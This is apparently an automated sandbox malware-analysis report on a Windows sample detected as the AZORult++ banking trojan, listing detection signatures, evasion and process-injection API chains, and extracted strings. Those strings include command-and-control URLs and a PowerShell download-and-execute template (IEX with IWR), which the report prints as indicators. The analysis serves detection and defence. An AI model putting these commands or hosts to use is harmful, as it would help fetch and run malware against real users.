Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe
Analysis ID:	1428896
MD5:	6d36580feee622f41b2ab6bfe79a8f5e
SHA1:	93e1cf1bb9ffa2d921d0402e6113ce50e6ed3bd7
SHA256:	3aa50555913747e4d6c5be45de96d771efea5f59251fd25a7746c0defcf12ba8
Tags:	exe
Infos:

Detection

AZORult++

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected AZORult++ Trojan

Multi AV Scanner detection for submitted file

Contain functionality to detect virtual machines

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Found potential string decryption / allocating functions

Program does not show much activity (idle)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

ReversingLabs: Detection: 52%

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B882F6 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_02B882F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B88310 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_02B88310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B88F70 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_02B88F70

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B885F0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_02B885F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B86670 HeapFree,ObtainUserAgentString,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,InternetOpenW,InternetSetOptionW,InternetConnectW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,InternetQueryDataAvailable,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_02B86670

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	String found in binary or memory: http://79.124.78.45/hockamore.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.78.45/hockamore.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	String found in binary or memory: https://www.clubedasluluzinhasro.com.br/assets/image
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.clubedasluluzinhasro.com.br/assets/image/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B88E00 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_02B88E00

Contains functionality to call native functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B85AB0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_02B85AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B85E10 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_02B85E10

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008FE87D	0_2_008FE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B885F0	0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B84220	0_2_02B84220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B84620	0_2_02B84620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B824F0	0_2_02B824F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B87830	0_2_02B87830
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B87410	0_2_02B87410

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: String function: 008F3040 appears 46 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: String function: 008F4480 appears 33 times

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal88.bank.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B861B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_02B861B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B86AA0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,

0_2_02B86AA0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Command line argument: jhl46745fghb

0_2_008F2F40

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Section loaded: sspicli.dll	Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_008F1300

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: VMWare %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxService.exe %systemroot%\System32\VBoxTray.exe

0_2_02B885F0

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,StrStrIW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,StrStrIW,GetModuleFileNameW,StrStrIW,

0_2_02B885F0

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

File opened / queried: C:\Windows\System32\VBoxService.exe

Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

0_2_02B885F0

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: POST%s\|%s\|qE2PyNqQStart%d\|%sINITWindowsPowerShell\v1.0\powershell.exe -enc %S%ComSpec% /c %Skernel32Wow64DisableWow64FsRedirectionWow64RevertWow64FsRedirectionShellExecuteWshell32openReleaseSeShutdownPrivilege%Shttp://79.124.78.45/hockamore.php%temp%\%paths%%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exesd2.ps1sd4.ps1https://www.clubedasluluzinhasro.com.br/assets/image/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"Hyper-VVMWareParallels Display AdapterRed Hat QXL controller%systemroot%\System32\VBoxService.exe%systemroot%\System32\VBoxTray.exe?
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Binary or memory string: Hyper-V
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Binary or memory string: VMWare
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Binary or memory string: %systemroot%\System32\VBoxService.exe
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Binary or memory string: %systemroot%\System32\VBoxTray.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_008F695B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F1300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_008F1300

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F1710 mov ecx, dword ptr fs:[00000030h]	0_2_008F1710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F75A2 mov eax, dword ptr fs:[00000030h]	0_2_008F75A2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F9763 mov eax, dword ptr fs:[00000030h]	0_2_008F9763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B87620 mov eax, dword ptr fs:[00000030h]	0_2_02B87620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B85E10 mov eax, dword ptr fs:[00000030h]	0_2_02B85E10

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008FA845 GetProcessHeap,

0_2_008FA845

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F3D4E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008F3D4E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F695B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008F695B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F421C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008F421C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008F43AF SetUnhandledExceptionFilter,	0_2_008F43AF

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B85AB0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_02B85AB0

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F44C5 cpuid

0_2_008F44C5

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_008F4103 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_008F4103

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

0_2_02B885F0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

⊘No contacted IP infos

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

ReversingLabs: Detection: 52%

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B882F6 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,	0_2_02B882F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B88310 InitializeCriticalSection,GetVolumeInformationW,StringFromGUID2,wsprintfA,CreateMutexW,GetLastError,WSAStartup,CryptAcquireContextA,CryptAcquireContextA,CoInitializeEx,ExpandEnvironmentStringsW,CreateFileW,ExitProcess,	0_2_02B88310
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B88F70 CryptGenRandom,HeapFree,GetProcessHeap,HeapFree,wsprintfA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	0_2_02B88F70

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

0_2_02B885F0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

0_2_02B86670

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	String found in binary or memory: http://79.124.78.45/hockamore.php
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://79.124.78.45/hockamore.php%temp%
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	String found in binary or memory: https://www.clubedasluluzinhasro.com.br/assets/image
Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657832514.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe, 00000000.00000002.1657716656.000000000100E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.clubedasluluzinhasro.com.br/assets/image/c

E-Banking Fraud

Detected AZORult++ Trojan

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B88E00 EntryPoint,GetUserDefaultLangID,ExitProcess,

0_2_02B88E00

Contains functionality to call native functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B85AB0 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,		0_2_02B85AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B85E10 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTempPathW,wnsprintfW,wnsprintfW,PathCombineW,CreateFileW,WriteFile,WriteFile,SetEndOfFile,SetFilePointer,wnsprintfW,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,GetCurrentProcess,SetFilePointer,WriteFile,FlushFileBuffers,SetEndOfFile,NtQueryInformationProcess,NtClose,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,NtClose,NtClose,NtClose,NtClose,CloseHandle,		0_2_02B85E10

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_008FE87D	0_2_008FE87D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B885F0	0_2_02B885F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B84220	0_2_02B84220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B84620	0_2_02B84620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B824F0	0_2_02B824F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B87830	0_2_02B87830
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: 0_2_02B87410	0_2_02B87410

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: String function: 008F3040 appears 46 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe	Code function: String function: 008F4480 appears 33 times

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal88.bank.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B861B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,

0_2_02B861B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Code function: 0_2_02B86AA0 VariantInit,CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysAllocString,SysFreeString,

0_2_02B86AA0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.14399.1813.exe

Command line argument: jhl46745fghb

0_2_008F2F40

